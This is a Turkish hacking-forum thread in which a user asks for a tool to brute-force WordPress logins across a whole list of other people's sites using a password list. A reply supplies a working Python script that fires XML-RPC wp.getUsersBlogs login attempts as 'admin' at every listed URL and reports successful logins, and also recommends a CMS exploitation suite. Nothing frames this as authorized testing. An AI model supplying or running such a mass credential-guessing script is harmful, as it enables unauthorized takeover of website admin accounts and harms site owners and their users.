- 24 May 2024
- 182
- 90
Cevaplarınızı bekliyorum..
Sızma Testleri En sağlam wordpress bruteforcer programı nedir?
- Konbuyu başlatan SiberAslan
- Başlangıç tarihi
- 24 May 2024
- 182
- 90
Hocam atıyorum elimde site.txt adlı bir dosya var ve bir sürü sitenin wp-login kısımları var bunlardaki user pass verisine saldırıp bilgileri almak istiyorum.. sık kullanılan user ve pass verilerininde bir txt dosyasında olduğunu varsayalım bütün sitelere brute force aticak bir yazılım nedir diyorum..
Python:
import requests
def bruteforce_wordpress(url, username, password):
api_url = url + "/xmlrpc.php"
data = """
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value><string>{username}</string></value></param>
<param><value><string>{password}</string></value></param>
</params>
</methodCall>
""".format(username=username, password=password)
response = requests.post(api_url, data=data)
if "<name>isAdmin</name><value>1</value>" in response.text:
print(f"[+] Başarılı giriş: {url} | Kullanıcı adı: {username} | Parola: {password}")
else:
print(f"[-] Giriş başarısız: {url} | Kullanıcı adı: {username} | Parola: {password}")
with open("url.txt", "r") as url_file:
urls = url_file.read().splitlines()
with open("pass.txt", "r") as pass_file:
passwords = pass_file.read().splitlines()
for url in urls:
for password in passwords:
bruteforce_wordpress(url, "admin", password) # Varsayılan kullanıcı adı: admingenel olarak şöyle bi kod var buda xmlrpc açık ise çalışıyor
alternatif olarak şöyle bişey var sadece wordpress değil bi çok CMS için genel zafiyet tarama toolu ayrıca içinde wordpress için bahsettiğin işlemi yapabileceğin modül de var.
GitHub - Tuhinshubhra/CMSeeK: CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSs
CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSs - Tuhinshubhra/CMSeeK
github.com
